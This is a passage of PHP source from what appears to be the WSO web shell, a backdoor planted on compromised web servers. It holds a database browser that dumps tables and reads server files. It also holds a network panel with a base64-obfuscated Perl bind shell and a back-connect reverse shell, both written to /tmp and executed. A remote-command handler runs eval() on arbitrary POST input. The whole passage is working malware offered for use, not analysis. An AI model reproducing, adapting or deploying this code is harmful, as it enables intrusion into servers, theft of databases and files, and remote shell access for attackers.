1771 $db->selectdb($_POST['sql_base']);
1772 switch($_POST['charset']) {
1773 case "Windows-1251": $db->setCharset('cp1251'); break;
1774 case "UTF-8": $db->setCharset('utf8'); break;
1775 case "KOI8-R": $db->setCharset('koi8r'); break;
1776 case "KOI8-U": $db->setCharset('koi8u'); break;
1777 case "cp866": $db->setCharset('cp866'); break;
1778 }
1779 if(empty($_POST['file'])) {
1780 ob_start("ob_gzhandler", 4096);
1781 header("Content-Disposition: attachment; filename=dump.sql");
1782 header("Content-Type: text/plain");
1783 foreach($_POST['tbl'] as $v)
1784 $db->dump($v);
1785 exit;
1786 } elseif($fp = @fopen($_POST['file'], 'w')) {
1787 foreach($_POST['tbl'] as $v)
1788 $db->dump($v, $fp);
1789 fclose($fp);
1790 unset($_POST['p2']);
1791 } else
1792 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1793 }
1794 wsoHeader();
1795 echo "
1796
1797<h1>Sql browser</h1><div class=content>
1798<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1799<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1800<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1801<td><select name='type'><option value='mysql' ";
1802 if(@$_POST['type']=='mysql')echo 'selected';
1803echo ">MySql</option><option value='pgsql' ";
1804if(@$_POST['type']=='pgsql')echo 'selected';
1805echo ">PostgreSql</option></select></td>
1806<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
1807<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
1808<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
1809 $tmp = "<input type=text name=sql_base value=''>";
1810 if(isset($_POST['sql_host'])){
1811 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1812 switch($_POST['charset']) {
1813 case "Windows-1251": $db->setCharset('cp1251'); break;
1814 case "UTF-8": $db->setCharset('utf8'); break;
1815 case "KOI8-R": $db->setCharset('koi8r'); break;
1816 case "KOI8-U": $db->setCharset('koi8u'); break;
1817 case "cp866": $db->setCharset('cp866'); break;
1818 }
1819 $db->listDbs();
1820 echo "<select name=sql_base><option value=''></option>";
1821 while($item = $db->fetch()) {
1822 list($key, $value) = each($item);
1823 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1824 }
1825 echo '</select>';
1826 }
1827 else echo $tmp;
1828 }else
1829 echo $tmp;
1830 echo "</td>
1831
1832 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1833 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1834 </tr>
1835 </table>
1836 <script>
1837 s_db='".@addslashes($_POST['sql_base'])."';
1838 function fs(f) {
1839 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1840 if(f.p1) f.p1.value='';
1841 if(f.p2) f.p2.value='';
1842 if(f.p3) f.p3.value='';
1843 }
1844 }
1845 function st(t,l) {
1846 d.sf.p1.value = 'select';
1847 d.sf.p2.value = t;
1848 if(l && d.sf.p3) d.sf.p3.value = l;
1849 d.sf.submit();
1850 }
1851 function is() {
1852 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1853 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1854 }
1855 </script>";
1856 if(isset($db) && $db->link){
1857 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1858 if(!empty($_POST['sql_base'])){
1859 $db->selectdb($_POST['sql_base']);
1860 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1861 $tbls_res = $db->listTables();
1862 while($item = $db->fetch($tbls_res)) {
1863 list($key, $value) = each($item);
1864 if(!empty($_POST['sql_count']))
1865 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1866 $value = htmlspecialchars($value);
1867 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
1868 }
1869 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1870 if(@$_POST['p1'] == 'select') {
1871 $_POST['p1'] = 'query';
1872 $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1873 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1874 $num = $db->fetch();
1875 $pages = ceil($num['n'] / 30);
1876 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1877 echo " of $pages";
1878 if($_POST['p3'] > 1)
1879 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1880 if($_POST['p3'] < $pages)
1881 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
1882 $_POST['p3']--;
1883 if($_POST['type']=='pgsql')
1884 $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1885 else
1886 $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1887 echo "<br><br>";
1888 }
1889 if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1890 $db->query(@$_POST['p2']);
1891 if($db->res !== false) {
1892 $title = false;
1893 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1894 $line = 1;
1895 while($item = $db->fetch()) {
1896 if(!$title) {
1897 echo '<tr>';
1898 foreach($item as $key => $value)
1899 echo '<th>'.$key.'</th>';
1900 reset($item);
1901 $title=true;
1902 echo '</tr><tr>';
1903 $line = 2;
1904 }
1905 echo '<tr class="l'.$line.'">';
1906 $line = $line==1?2:1;
1907 foreach($item as $key => $value) {
1908 if($value == null)
1909 echo '<td><i>null</i></td>';
1910 else
1911 echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1912 }
1913 echo '</tr>';
1914 }
1915 echo '</table>';
1916 } else {
1917 echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1918 }
1919 }
1920 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1921 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1922 echo htmlspecialchars($_POST['p2']);
1923 echo "</textarea><br/><input type=submit value='Execute'>";
1924 echo "</td></tr>";
1925 }
1926 echo "</table></form><br/>";
1927 if($_POST['type']=='mysql') {
1928 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1929 if($db->fetch())
1930 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1931 }
1932 if(@$_POST['p1'] == 'loadfile') {
1933 $file = $db->loadFile($_POST['p2']);
1934 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1935 }
1936 } else {
1937 echo htmlspecialchars($db->error());
1938 }
1939 echo '</div>';
1940 wsoFooter();
1941}
1942function actionNetwork() {
1943 wsoHeader();
1944 $back_connect_p="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"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1945 echo "<h1>Network tools</h1><div class=content>
1946
1947 <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
1948 <span>Bind port to /bin/sh [perl]</span><br/>
1949 Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1950 </form>
1951 <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
1952 <span>Back-connect [perl]</span><br/>
1953 Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
1954
1955 </form><br>";
1956 if(isset($_POST['p1'])) {
1957 function cf($f,$t) {
1958 $w = @fopen($f,"w") or @function_exists('file_put_contents');
1959 if($w){
1960 @fwrite($w,@base64_decode($t));
1961 @fclose($w);
1962 }
1963 }
1964 if($_POST['p1'] == 'bpp') {
1965 cf("/tmp/bp.pl",$bind_port_p);
1966 $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
1967 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
1968 unlink("/tmp/bp.pl");
1969 }
1970 if($_POST['p1'] == 'bcp') {
1971 cf("/tmp/bc.pl",$back_connect_p);
1972 $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
1973 echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
1974 unlink("/tmp/bc.pl");
1975 }
1976 }
1977 echo '</div>';
1978 wsoFooter();
1979}
1980function actionRC() {
1981 if(!@$_POST['p1']) {
1982 $a = array(
1983 "uname" => php_uname(),
1984 "php_version" => phpversion(),
1985 "wso_version" => WSO_VERSION,
1986 "safemode" => @ini_get('safe_mode')
1987 );
1988 echo serialize($a);
1989 } else {
1990 eval($_POST['p1']);
1991 }
1992}
1993if( empty($_POST['a']) )
1994 if(isset($default_action) && function_exists('action' . $default_action))
1995 $_POST['a'] = $default_action;
1996 else
1997 $_POST['a'] = 'SecInfo';
1998if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
1999 call_user_func('action' . $_POST['a']);
2000function FetchURL($url) {
2001 $ch = curl_init();
2002 curl_setopt($ch, CURLOPT_USERAGENT, "$cheader");
2003 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
2004 curl_setopt($ch, CURLOPT_HEADER, false);
2005 curl_setopt($ch, CURLOPT_URL, $url);
2006 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2007 curl_setopt($ch, CURLOPT_TIMEOUT, 30);
2008 $data = curl_exec($ch);
2009 if(!$data) {
2010 return false;
2011 }
2012 return $data;
2013 }
2014exit;
2015?>